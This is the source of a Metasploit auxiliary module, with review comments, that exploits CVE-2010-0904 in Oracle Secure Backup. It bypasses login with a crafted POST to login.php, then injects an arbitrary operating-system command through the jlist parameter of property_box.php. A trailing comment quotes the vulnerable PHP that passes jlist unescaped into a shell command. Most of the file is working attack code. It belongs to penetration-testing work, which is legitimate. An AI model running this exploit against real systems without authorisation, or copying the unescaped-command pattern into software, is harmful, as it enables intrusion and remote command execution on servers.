rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/oracle/osb_execqr3.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary module for CVE-2010-0904 in the Oracle Secure Backup web interface.
#
# Per the module description, it chains an authentication bypass in login.php
# with a command injection in property_box.php, and was tested against
# Oracle Secure Backup 10.3.0.1.0 (Win32).
#
# What the module leaves behind, as far as this file shows:
# * two POST requests (/login.php, then /property_box.php), which is
#   consistent with the IOC_IN_LOGS side effect declared below;
# * whatever the CMD option does on the target. The default CMD writes
#   %SYSTEMDRIVE%\metasploit.txt.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and its datastore options.
  #
  # @param info [Hash] metadata overrides, merged through update_info
  def initialize(info = {})
    details = {
      'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
      'Description' => %q{
        This module exploits an authentication bypass vulnerability
        in login.php in order to execute arbitrary code via a command injection
        vulnerability in property_box.php. This module was tested
        against Oracle Secure Backup version 10.3.0.1.0 (Win32).
      },
      'Author' => ['MC'],
      'License' => MSF_LICENSE,
      'References' => [
        ['CVE', '2010-0904'],
        ['OSVDB', '66338'],
        ['ZDI', '10-118']
      ],
      'DisclosureDate' => '2010-07-13',
      # NOTE(review): the default CMD redirects output into a file on the
      # target, so ARTIFACTS_ON_DISK may also belong in SideEffects - confirm.
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [IOC_IN_LOGS],
        'Reliability' => []
      }
    }
    super(update_info(info, details))

    # The SSL default is switched on to match the 443 default port.
    # CMD is declared optional, but run concatenates it into the request body
    # without a nil check.
    module_options = [
      Opt::RPORT(443),
      OptString.new('CMD', [false, 'The command to execute.', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),
      OptBool.new('SSL', [true, 'Use SSL', true])
    ]
    register_options(module_options)
  end

  # Requests a session from login.php, then submits CMD through the jlist
  # parameter of property_box.php.
  #
  # The second response is discarded, so 'Done.' only means the request was
  # sent; it does not confirm that the command ran on the target.
  #
  # Seen from the server, the sequence is a POST to /login.php with the body
  # 'attempt=1&uname=-', followed by a POST to /property_box.php with
  # type=Job and a jlist value that starts with a URL-encoded '&'.
  #
  # @return [void]
  def run
    # Both requests use a 5 second timeout (second argument to send_request_cgi).
    login = send_request_cgi(
      {
        'uri' => '/login.php',
        'data' => 'attempt=1&uname=-',
        'method' => 'POST'
      }, 5
    )

    # Stop unless the login response handed back a PHPSESSID cookie.
    cookies = login.get_cookies if login
    unless cookies&.match(/PHPSESSID=(.*);(.*)/i)
      print_error('Invalid PHPSESSION token..')
      return
    end

    command = datastore['CMD']
    print_status("Sending command: #{command}...")

    # The '&' prefix and the command are URL-encoded together as one jlist value.
    body = 'type=Job&jlist=' + Rex::Text.uri_encode('&' + command)
    send_request_cgi(
      {
        'uri' => '/property_box.php',
        'data' => body,
        'cookie' => cookies,
        'method' => 'POST'
      }, 5
    )

    print_status('Done.')
  end
end
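=begin
Server-side PHP excerpt: the "Job" branch that this module's request to
property_box.php (type=Job) reaches. Each $objectname element is passed through
escapeshellarg(), but $jlist is interpolated into the exec_qr() command line
as-is; the excerpt does not show where $jlist is first set.

else if (strcmp($type, "Job") == 0)
    {
    if (!is_array($objectname))
        $objectname = array();
    reset($objectname);
    while (list(,$oname) = each($objectname))
        {
        $oname = escapeshellarg($oname);
        $jlist = "$jlist $oname";
        }
    if (strlen($jlist) > 0)
        $msg = exec_qr("$rbtool lsjob -lrRLC $jlist");
=end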